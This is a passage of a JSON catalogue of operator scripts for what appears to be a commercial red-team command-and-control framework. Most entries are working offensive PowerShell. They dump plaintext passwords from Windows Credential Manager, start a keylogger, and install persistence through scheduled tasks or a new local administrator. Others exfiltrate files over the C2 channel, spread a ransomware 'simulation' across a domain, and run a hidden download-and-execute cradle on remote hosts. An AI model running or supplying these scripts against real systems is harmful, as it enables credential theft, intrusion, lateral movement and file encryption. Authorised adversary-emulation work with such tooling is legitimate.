scripts.json

[
  {
    "identifier": "0cd0bc34076e4fe99f65c5a2c6931d84",
    "name": "Enable Remote Desktop Services (RDP) via API",
    "description": "Enables Remote Desktop Protocol (RDP) and allows inbound RDP Connections through the firewall.",
    "documentation": "# Overview\r\n\r\nThis script enables Remote Desktop Protocol (RDP) by setting the following registry value:\r\n\r\n- **Path:** HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server\r\n- **Name:** fDenyTSConnections\r\n- **Value:** 0\r\n\r\nNext, the script enables RDP through the firewall by enabling the built-in rule \"Remote Desktop\".\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites:\r\n\r\n- Administrator or SYSTEM privileges.",
    "scriptBlock": "Set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server' -Name \"fDenyTSConnections\" -Value 0\r\nEnable-NetFirewallRule -DisplayGroup \"Remote Desktop\"",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "e70559b7671148ed835c3b2df3c7db99",
    "name": "Get Domain Users via Commandline",
    "description": "Gets a list of domain users from the current domain.",
    "documentation": "# Overview\r\n\r\nRuns a net command to list all domain users in the current domain.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites:\r\n\r\n- Authenticated user.\r\n\r\n# Example Output\r\n\r\n```\r\nThe request will be processed at a domain controller for domain lab.net.\r\n\r\n\r\nUser accounts for \\\\DC1.lab.net\r\n\r\n-------------------------------------------------------------------------------\r\nAdministrator            Guest                    john.doe                 \r\nkrbtgt                   \r\nThe command completed successfully.\r\n\r\n\r\n```",
    "scriptBlock": "net user /domain",
    "version": 2,
    "isPremium": true,
    "labels": [
      "active-directory",
      "command-line",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "a32b62be9b284f6da4750efa8bae1906",
    "name": "Persistence via Obfuscated Binary and Scheduled Task Commandline",
    "description": "Generates a new obfuscated payload and installs it for persistence on the target.",
    "documentation": "# Overview\r\n\r\nInstalls persistence by creating a scheduled task to run a an obfuscated cradle on startup or login using schtasks.exe. This script requires a high integrity process for the System profile.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- High Integrity process for the System Profile\r\n\r\n# Example Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"Persistence\": {\r\n      \"Id\": \"5a6fa3623aa744bd933f6ba168b0ca13\",\r\n      \"Method\": \"Scheduled Task\",\r\n      \"Trigger\": \"OnStartup\",\r\n      \"Build\": \"92cbf1b0f92642859f28f258226cc1f3\",\r\n      \"Profile\": \"System\",\r\n      \"Event\": \"Create\",\r\n      \"Success\": true,\r\n      \"UninstallScript\": \"$output = (schtasks /DELETE /TN 'CacheTask' /F) -join ([System.Environment]::NewLine);\\r\\n$success = $output -like 'success';\\r\\ntry {\\r\\n\\t[Environment]::SetEnvironmentVariable('GPO_AUX', $null, 'Machine');\\r\\n} catch {\\r\\n\\t$success = $false;\\r\\n\\tthrow;\\r\\n}\\r\\n\\r\\nNew-Object PSObject -Property @{\\r\\n\\tPersistence = New-Object PSObject -Property @{\\r\\n\\t\\tId = \\\"5a6fa3623aa744bd933f6ba168b0ca13\\\";\\r\\n\\t\\tEvent = \\\"Delete\\\";\\r\\n\\t\\tSuccess = $success;\\r\\n\\t    Method = \\\"Scheduled Task\\\";\\r\\n\\t    Profile = \\\"System\\\";\\r\\n\\t    Trigger = \\\"OnStartup\\\";\\r\\n\\t}\\r\\n}\",\r\n      \"TaskName\": \"CacheTask\",\r\n      \"EnvironmentVariableName\": \"GPO_AUX\"\r\n    }\r\n  }\r\n]\r\n```\r\n\r\n# Example Uninstall Script\r\n\r\nThis script generates an uninstall script that removes the persistence mechanism.\r\n\r\n```ps1\r\n$output = (schtasks /DELETE /TN 'CacheTask' /F) -join ([System.Environment]::NewLine);\r\n$success = $output -like 'success';\r\ntry {\r\n\t[Environment]::SetEnvironmentVariable('GPO_AUX', $null, 'Machine');\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"5a6fa3623aa744bd933f6ba168b0ca13\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"Scheduled Task\";\r\n\t    Profile = \"System\";\r\n\t    Trigger = \"OnStartup\";\r\n\t}\r\n}\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the scheduled task.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$TaskName = 'BackgroundWorker',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"Either User or System depending upon your level of access.\")]\r\n    [ValidateSet('User', 'System')]\r\n    [string]$Profile = 'User',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The event that will activate the PowerShell cradle.\")]\r\n    [ValidateSet('OnLogon', 'OnStart')]\r\n    [string]$Trigger = 'OnLogon',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The type of payload to drop.\")]\r\n    [ValidateSet(\"csharp_load_module\", \"csharp_powershell_host\")]\r\n    [string]$Payload = \"csharp_load_module\"\r\n)\r\n\r\n\r\ntry {\r\n    #Generate a payload\r\n    $contents = payload -Build $Build -Kind $Payload;\r\n    $assembly = [System.Reflection.Assembly]::Load($contents);\r\n    $name = $assembly.GetName();\r\n\r\n    #Drop the payload to disk\r\n    if($Profile -eq 'System') {\r\n        $path = \"C:\\Program Files\\$($name.Name)\\$($name.Name).exe\";\r\n    } else {\r\n        $tempfolder = [System.IO.Path]::GetTempPath();\r\n        $path = [System.IO.Path]::Combine($tempfolder, [System.IO.Path]::Combine($name.Name, $name.Name + \".exe\"));\r\n    }\r\n    $directory = [System.IO.Path]::GetDirectoryName($path);\r\n    if(![System.IO.Directory]::Exists($directory)) {\r\n        [void][System.IO.Directory]::CreateDirectory($directory);\r\n    }\r\n    [System.IO.File]::WriteAllBytes($path, $contents);\r\n    $config = Get-CompatibilityConfig\r\n    [System.IO.File]::WriteAllText($path + \".config\", $config);\r\n\r\n    #Configure the scheduled task for persistence\r\n\t$output = (schtasks /CREATE /SC $Trigger /TN $TaskName /TR $path /F) -join ([Environment]::NewLine);\r\n\t$success = $output -like '*success*';\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\n$id = [Guid]::NewGuid().ToString().Replace(\"-\", \"\");\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = $id;\r\n\t\tEvent = \"Create\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"Scheduled Task\";\r\n\t    Profile = $Profile;\r\n\t    Trigger = $Trigger;\r\n\t    TaskName = $TaskName;\r\n\t    Path = $path;\r\n\t    Build = $Build;\r\n\t    UninstallScript = @\"\r\n`$output = (schtasks /DELETE /TN '$TaskName' /F) -join ([System.Environment]::NewLine);\r\n`$success = `$output -like '*success*';\r\ntry {\r\n\t[System.IO.File]::Delete('$path');\r\n    [System.IO.File]::Delete(`$path + '.config');\r\n} catch {\r\n\t`$success = `$false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"$id\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = `$success;\r\n\t    Method = \"Scheduled Task\";\r\n\t    Profile = \"$Profile\";\r\n\t    Trigger = \"$Trigger\";\r\n\t}\r\n}\r\n\"@;\r\n\t}\r\n}",
    "version": 9,
    "isPremium": true,
    "labels": [
      "command-and-scripting-interpreter",
      "command-line",
      "persistence",
      "powershell",
      "scheduled-task",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "58046baaf95444358ed88bd696d451a8",
    "name": "Get DNS Cache via Commandline",
    "description": "This script retrieves the local DNS cache using ipconfig.",
    "documentation": "# Overview\r\n\r\nRuns the ipconfig command to show the local DNS cache.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nWindows IP Configuration\r\n\r\n    prod.detectportal.prod.cloudops.mozgcp.net\r\n    ----------------------------------------\r\n    Record Name . . . . . : prod.detectportal.prod.cloudops.mozgcp.net\r\n    Record Type . . . . . : 1\r\n    Time To Live  . . . . : 112\r\n    Data Length . . . . . : 4\r\n    Section . . . . . . . : Answer\r\n    A (Host) Record . . . : 34.107.221.82\r\n```",
    "scriptBlock": "ipconfig /displaydns",
    "version": 1,
    "isPremium": true,
    "labels": [
      "command-line",
      "discovery",
      "host-discovery",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "c3c240c0c3cf44598ff1c427f9821fac",
    "name": "Get Stored Passwords From the Windows Credential Manager",
    "description": "Retrieves plaintext username and password combinations stored in the Windows Credential Manager.",
    "documentation": "# Overview\r\n\r\nLeverages the CredentialManager.dll to extract plaintext credentials.\r\n\r\n# Dependencies\r\n\r\n- CredentialManager\r\n- PSCredentialManager.Common\r\n- PSCredentialManager.Api\r\n- .NET 4 or higher\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- High Integrity process.\r\n\r\n# Example Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"Password\": \"gho_Z5DRvcX4eEP2MnGNCwZnyl78OiFwUHomLzIj\",\r\n    \"Username\": \"hax0r\"\r\n  },\r\n  {\r\n    \"Password\": \"thisismypassword\",\r\n    \"Username\": \"hax0r\"\r\n  }\r\n]\r\n\r\n```",
    "scriptBlock": "load CredentialManager;\r\nload PSCredentialManager.Api;\r\n\r\nGet-StoredCredential | % {\r\n    $ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password);\r\n    New-Object PSObject -Property @{\r\n        Username = $_.Username;\r\n        Password = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($ptr);\r\n    }\r\n}",
    "version": 2,
    "isPremium": true,
    "labels": [
      "api",
      "credential-access",
      "credential-harvesting",
      "credentials-from-password-stores",
      "windows",
      "windows-credential-manager"
    ],
    "enabled": true
  },
  {
    "identifier": "d40c872b121545cda799cd7eb62e6bc7",
    "name": "Exfiltrate File",
    "description": "Exfiltrates the selected file over the C2 channel.",
    "documentation": "# Overview\r\n\r\nExfiltrates the specified file over the C2 channel and adds it to the artifacts.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Example Output\r\n\r\n```\r\nFilename      Size\r\n--------      ----\r\ngit notes.txt 1832\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"Absolute or relative path to the file to exfiltrate.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Path\r\n)\r\n\r\nexfil $Path",
    "version": 3,
    "isPremium": true,
    "labels": [
      "api",
      "collection"
    ],
    "enabled": true
  },
  {
    "identifier": "041350b369ac4d2fba783a4a10823675",
    "name": "Get Local TCP Listeners",
    "description": "Leverages the C# BCL to retrieve a list of TCP listeners on the localhost.",
    "documentation": "# Overview\r\n\r\nThis script retieves the following information for each TCP listener:\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Example Output\r\n\r\n```\r\nAddressFamily  Address        Port\r\n-------------  -------        ----\r\nInterNetwork   0.0.0.0         135\r\nInterNetwork   0.0.0.0         445\r\nInterNetwork   0.0.0.0        5040\r\nInterNetwork   0.0.0.0        5985\r\nInterNetwork   0.0.0.0       47001\r\nInterNetwork   0.0.0.0       49664\r\nInterNetwork   0.0.0.0       49665\r\nInterNetwork   0.0.0.0       49666\r\nInterNetwork   0.0.0.0       49667\r\nInterNetwork   0.0.0.0       49668\r\nInterNetwork   0.0.0.0       49669\r\nInterNetwork   0.0.0.0       49670\r\nInterNetwork   127.0.0.1     27017\r\nInterNetwork   192.168.1.103   139\r\nInterNetworkV6 ::              135\r\nInterNetworkV6 ::              445\r\nInterNetworkV6 ::             5985\r\nInterNetworkV6 ::            47001\r\nInterNetworkV6 ::            49664\r\nInterNetworkV6 ::            49665\r\nInterNetworkV6 ::            49666\r\nInterNetworkV6 ::            49667\r\nInterNetworkV6 ::            49668\r\nInterNetworkV6 ::            49669\r\nInterNetworkV6 ::            49670\r\n```",
    "scriptBlock": "load recon;\r\n\r\nGet-TcpListeners",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "linux",
      "mac",
      "recon",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "29b544d341cf4660865c9d6b57fa1dfc",
    "name": "Get Current Process Information",
    "description": "Get detailed information about the current process such as the full path to the executable, commandline args, integrity level, and bitness.",
    "documentation": "# Overview\r\n\r\nGet basic information about the current process including:\r\n\r\n- Commandline arguments\r\n- Process Integrity Level\r\n- Process Id\r\n- Parent Process Id\r\n- Name\r\n- Full path to the executable\r\n- Username and domain name (if applicable)\r\n- Bitness (either x86 or x64)\r\n\r\n# Dependencies\r\n\r\n- Common\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Text\r\n\r\n```\r\nCommandLine    : \"C:\\Users\\helpdesk\\Desktop\\Workspace\\repos\\SpecterInsight\\src\\Release\\implants\\e060ed549dcf469ab02bc8bfa318877e\\x64\\WinNativeExe.exe\" \r\nIntegrityLevel : Medium\r\nPID            : 16260\r\nPPID           : 4140\r\nName           : WinNativeExe.exe\r\nPath           : C:\\Users\\helpdesk\\Desktop\\Workspace\\repos\\SpecterInsight\\src\\Release\\implants\\e060ed549dcf469ab02bc8bfa318877e\\x64\\WinNativeExe.exe\r\nUsername       : DESKTOP-LMCH70V\\helpdesk\r\nBitness        : x64\r\n```\r\n\r\n# Example Json\r\n\r\n```json\r\n{\r\n  \"CommandLine\": \"C:\\\\Users\\\\helpdesk\\\\Desktop\\\\Workspace\\\\repos\\\\SpecterInsight\\\\src\\\\Release\\\\implants\\\\e060ed549dcf469ab02bc8bfa318877e\\\\x64\\\\WinNativeExe.exe\",\r\n  \"IntegrityLevel\": \"Medium\",\r\n  \"PID\": 16260,\r\n  \"PPID\": 4140,\r\n  \"Name\": \"WinNativeExe.exe\",\r\n  \"Path\": \"C:\\\\Users\\\\helpdesk\\\\Desktop\\\\Workspace\\\\repos\\\\SpecterInsight\\\\src\\\\Release\\\\implants\\\\e060ed549dcf469ab02bc8bfa318877e\\\\x64\\\\WinNativeExe.exe\",\r\n  \"Username\": \"DESKTOP-LMCH70V\\\\helpdesk\",\r\n  \"Bitness\": \"x64\"\r\n}\r\n```",
    "scriptBlock": "load common;\r\n\r\nSurvey-Processes -Current -Detailed",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "46c2bf89b854464ba46d8e6c7a6f893b",
    "name": "Start Keylogger",
    "description": "Starts capturing keystrokes.",
    "documentation": "# Overview\r\n\r\nCaptures keystrokes by monitoring Windows UI messages and records them to an internal buffer.\r\n\r\n# Dependencies\r\n\r\n* Credentials",
    "scriptBlock": "load credentials;\r\n\r\nStart-Keylogger;",
    "version": 2,
    "isPremium": true,
    "labels": [
      "api",
      "input-capture",
      "keylogging"
    ],
    "enabled": true
  },
  {
    "identifier": "c39d0b32927049f09461ce84b028cbaa",
    "name": "Persistence via New Local Administrator Commandline",
    "description": "Adds a new user to the system with the specified password and then adds that user to the local Administrators group.",
    "documentation": "# Overview\r\n\r\nRuns a net user command to add a new user to the system with the specified password. It then runs a net localgroup command to add the new user to the local Administrators group.\r\n\r\n# Parameters\r\n\r\n- **Username:** The name of the user to create.\r\n- **Password:** The password for the new user.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites:\r\n\r\n- Administrator privileges.\r\n- High Integrity process.\r\n- The specified password must meet system requirements.\r\n\r\n# Example Output\r\n\r\n```json\r\n{\r\n  \"Persistence\": {\r\n    \"Password\": \"frickenlaserbeams\",\r\n    \"Id\": \"83c034a110a74cffb33b4590b19b20f6\",\r\n    \"Method\": \"Create Local Admin Account\",\r\n    \"Trigger\": \"Authentication\",\r\n    \"Profile\": \"System\",\r\n    \"Username\": \"drevil\",\r\n    \"Event\": \"Create\",\r\n    \"Success\": true,\r\n    \"UninstallScript\": \"net user \\\"drevil\\\" /DELETE | Out-Null;\\r\\n$output = (net user \\\"drevil\\\" 2>&1) -join ([System.Environment]::NewLine);\\r\\n$success = $output.Contains(\\\"The user name could not be found.\\\") -and !$output.Contains(\\\"syntax of this command\\\");\\r\\nNew-Object PSObject -Property @{\\r\\n\\tPersistence = New-Object PSObject -Property @{\\r\\n\\t\\tId = \\\"83c034a110a74cffb33b4590b19b20f6\\\";\\r\\n\\t\\tEvent = \\\"Delete\\\";\\r\\n\\t\\tSuccess = $success;\\r\\n\\t    Method = \\\"Create Local Admin Account\\\";\\r\\n\\t    Profile = \\\"System\\\";\\r\\n\\t    Trigger = \\\"Authentication\\\";\\r\\n\\t}\\r\\n}\"\r\n  }\r\n}\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the user account to create.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Username = 'Backup Administrator',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the user account to create.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Password = '12qwaszx!@QWASZX'\r\n)\r\n\r\nnet user $Username $Password /ADD /Y | Out-Null;\r\nnet localgroup 'Administrators' $Username /ADD | Out-Null;\r\n$output = (net user $Username 2>&1) -join ([System.Environment]::NewLine);\r\n$success = !$output.Contains(\"The user name could not be found.\") -and !$output.Contains(\"syntax of this command\");\r\n$id = [Guid]::NewGuid().ToString().Replace(\"-\", \"\");\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = $id;\r\n\t\tEvent = \"Create\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"Create Local Admin Account\";\r\n\t    Profile = \"System\";\r\n\t    Trigger = \"Authentication\";\r\n\t    Username = $Username;\r\n\t    Password = $Password;\r\n\t    UninstallScript = @\"\r\nnet user \"$Username\" /DELETE | Out-Null;\r\n`$output = (net user \"$Username\" 2>&1) -join ([System.Environment]::NewLine);\r\n`$success = `$output.Contains(\"The user name could not be found.\") -and !`$output.Contains(\"syntax of this command\");\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"$id\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = `$success;\r\n\t    Method = \"Create Local Admin Account\";\r\n\t    Profile = \"System\";\r\n\t    Trigger = \"Authentication\";\r\n\t}\r\n}\r\n\"@;\r\n\t}\r\n}",
    "version": 15,
    "isPremium": true,
    "labels": [
      "command-line",
      "create-account",
      "local-account",
      "persistence",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "816c32cda1ac4f6698525d7e1786074c",
    "name": "Ransomware Simulation",
    "description": "This script simulates a ransomware attack by distributing and obfuscated encrypter via WMI, Scheduled Task, or PsExec.",
    "documentation": "# Overview\r\n\r\nThis script distributes an obfuscated ransomware payload via WMI, Scheduled Task, or PsExec from left to right until on succeeds. The script can use either impersonation or username and password for authentication. For targetting, the script can either pull a list of domain computers from Active Directory instance tied to the current user or take in a target list containing hostnames, IPs, or CIDR ranges. When using auto targetting, the Specter implant must be running under a domain user account. Once a target list is built, the list is resolved to IP addresses. The IP addresses of the localhost are removed from the list so that your foothold in the network is not impacted.\r\n\r\nNext, the script performs a multithreaded port scan of each IP on port 445 to identify live hosts. Once that is complete, the script generates a new obfuscated ransomware payload and PowerShell stager script. Those two payloads are cached in the server. Live hosts then are passed to a multithreaded cmdlet to run a PowerShell cradle on each live system that will download the PowerShell stager script that loads the ransomware payload.\r\n\r\nThe ransomware payload looks for all files in C:\\Users\\ with specific extensions. It the begins encrypting each file and deleting the original. The encrypted files are stored with the keys to decrypt so that a real threat actor could not use this script to ransom a target. It also gives students an opportunity to practice recovery using forensic malware analysis. Once encryption completes, the ransomware drops a ransom note application and creates a shortcut in the global startup folder. It then reboots the system. The next user to logon will see the ransom note.\r\n\r\n# Dependencies\r\n\r\n- recon\r\n- lateral\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- Valid administrator credentials for the target system(s) or domain.\r\n\r\n# Example Output\r\n\r\n```\r\nComputerName  ScheduledTask                     Success\r\n------------  -------------                     -------\r\n192.168.1.2   @{Success=True; Message=Success!}    True\r\n192.168.1.103 @{Success=True; Message=Success!}    True\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$False, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$False, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string[]]$Targets,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [Parameter(ParameterSetName=\"Autotarget - Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Username,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [Parameter(ParameterSetName=\"Autotarget - Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Password\r\n)\r\n\r\n#Import dependencies\r\nload recon;\r\nload lateral;\r\n\r\n#Build a list of IP addresses to target\r\nif($Targets -eq $null -or $Targets.Length -le 0) {\r\n    #Autotarget from Active Directory\r\n    $computers = computers | resolve | % { $_.ToString() };\r\n} else {\r\n    #Use explicit targetting\r\n    $computers = $Targets | resolve | % { $_.ToString() };\r\n}\r\n\r\n#Build a list of local IP addressess\r\n$localhost = New-Object 'System.Collections.Generic.Dictionary[string, string]';\r\n$interfaces = interfaces;\r\nforeach($interface in $interfaces) {\r\n    foreach($entry in $interface.InterfaceIPs) {\r\n        $ip = $entry.IP.ToString();\r\n        if(!$localhost.ContainsKey($ip)) {\r\n            $localhost.Add($ip, $ip);\r\n        }\r\n    }\r\n}\r\n\r\n#Remove localhost from target list\r\n$computers = $computers | ? { !$localhost.ContainsKey($_); }\r\n\r\n#Find systems that are alive via a quick port scan\r\n$scan = scan -Targets ([string[]]$computers) -Ports @(445);\r\n$alive = $scan | ? { $_.'445' -eq 'OPEN' };\r\n$addresses = $alive | % { $_.IPAddress; }\r\n\r\n#Generate the payload\r\n$payload = payload -Kind 'ps_ransom_command';\r\n\r\n#Pre-generate stage 2 and 3\r\npayload -Kind 'ps_ransom_script' | Out-Null;\r\npayload -Kind 'csharp_ransomware' | Out-Null;\r\n\r\n#Deploy the payload to the targets we can reach\r\ntry {\r\n    $results = Invoke-ParallelCommand -Targets ([string[]]$addresses) -Command $payload -Username $Username -Password $Password;\r\n} catch {\r\n    $_.Exception;\r\n}\r\n\r\n#Output the results\r\n$results",
    "version": 2,
    "isPremium": true,
    "labels": [
      "api",
      "powershell",
      "remote-system-discovery",
      "scheduled-task",
      "windows-management-instrumentation",
      "service-execution",
      "windows",
      "system-network-configuration-discovery",
      "lateral-movement",
      "active",
      "network-service-discovery",
      "ransomware",
      "impact",
      "data-encrypted-for-impact"
    ],
    "enabled": true
  },
  {
    "identifier": "afd1e2b21f334a31b4fa6aa30461f63b",
    "name": "Lateral Movement with Scheduled Tasks and PowerShell Cradle Commandline",
    "description": "This script leverages schtasks.exe, username, and password to remotely execute a Specter PowerShell cradle.",
    "documentation": "# Overview\r\n\r\nThis script leverages schtasks.exe to run a scheduled task on the operator specified system using username and password. A PowerShell cradle is executed as either the specified user or NT AUTHORITY\\SYSTEM. The $Hostname parameter can be either hostname, FQDN, or IP.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- Valid administrator credentials for the target systems.\r\n- Scheduled Task service running on the target.\r\n\r\n# Example Output\r\n\r\n```\r\nSUCCESS: The scheduled task \"CacheTask\" has successfully been created.\r\nSUCCESS: Attempted to run the scheduled task \"CacheTask\".\r\nSUCCESS: The scheduled task \"CacheTask\" was successfully deleted.\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The target hostname or IP address.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Hostname,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The user to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Username,\r\n\r\n    [Parameter(Mandatory = $false, HelpMessage = \"The domain the user belongs to or leave blank if it is a local user.\")]\r\n    [string]$Domain,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The password for the specified user account.\")]\r\n    [ValidateNotNull()]\r\n    [string]$Password,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"Run the task as the specified user or as NT AUTHORITY\\SYSTEM.\")]\r\n    [ValidateSet('User', 'System')]\r\n    [string]$Profile = \"System\",\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the scheduled task.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$TaskName = 'CacheTask',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\n$RunAsSystem = $Profile -eq 'System';\r\n#Get the URLs for the cradle generator\r\n$url = payload -Build $Build -Kind 'ps_url' | % { \"'$_'\" };\r\n$task = \"powershell -Win h -ep b -c \\`\"[Net.ServicePointManager]::ServerCertificateValidationCallback={`$true};icm ([ScriptBlock]::Create([Net.WebClient]::new().DownloadString(\\\\\\`\"$url\\\\\\`\")))\\`\"\";\r\n\r\nif($Profile -eq 'User') {\r\n    schtasks /CREATE /S $Hostname /U $Username /P $Password /SC ONCE /ST 23:59 /TN $TaskName /TR $task /F;\r\n} else {\r\n    schtasks /CREATE /S $Hostname /U $Username /P $Password /RU SYSTEM /SC ONCE /ST 23:59 /TN $TaskName /TR $task /F;\r\n}\r\nschtasks /RUN /S $Hostname /U $Username /P $Password /TN $TaskName;\r\nStart-Sleep -Seconds 5;\r\nschtasks /DELETE /S $Hostname /U $Username /P $Password /TN $TaskName /F;",
    "version": 8,
    "isPremium": true,
    "labels": [
      "command-and-scripting-interpreter",
      "command-line",
      "lateral-movement",
      "powershell",
      "scheduled-task",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "c90c604ee12b49d3931e61ebe325649a",
    "name": "Change Expiration Date",
    "description": "Changes the expiration date for the Specter.",
    "documentation": "# Overview\r\n\r\nThis script will update the expiration date for the deployed Specter. By default, all Specters have an expiration date defined by the initial build parameters. Issuing this command will modify the expiration date for this session only. Any other session using the same build will not be affected.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n- Linux\r\n- Mac\r\n\r\n# Example Output\r\n\r\n```txt\r\nThursday, December 21, 2023 9:17:49 PM\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The new expiration date in UTC.\")]\r\n    [DateTime]$ExpirationDate= [DateTime]::UtcNow.AddDays(30)\r\n)\r\n\r\nSet-ExpirationDate -Expiration $ExpirationDate\r\nGet-ExpirationDate",
    "version": 2,
    "isPremium": true,
    "labels": [
      "implant-configuration-modification"
    ],
    "enabled": true
  },
  {
    "identifier": "08e4027cd94843caab134173726a359a",
    "name": "Lateral Movement with WMI and PowerShell Cradle via API",
    "description": "Run a PowerShell cradle on a remote system using the WMI API.",
    "documentation": "# Overview\r\n\r\nThis script leverages Windows Management Instrumentation (WMI) to start a process on the operator specified system using username and password or impersonation. An obfuscated PowerShell cradle is executed as either the specified user. The $Target parameter can be either hostname, FQDN, or IP.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- Valid administrator credentials for the target systems.\r\n- WMI service must be running on the remote system.\r\n- WMI must be allowed through the firewall.\r\n\r\n# Example Output\r\n\r\n```\r\n__GENUS          : 2\r\n__CLASS          : __PARAMETERS\r\n__SUPERCLASS     : \r\n__DYNASTY        : __PARAMETERS\r\n__RELPATH        : \r\n__PROPERTY_COUNT : 2\r\n__DERIVATION     : {}\r\n__SERVER         : \r\n__NAMESPACE      : \r\n__PATH           : \r\nProcessId        : 4556\r\nReturnValue      : 0\r\n```",
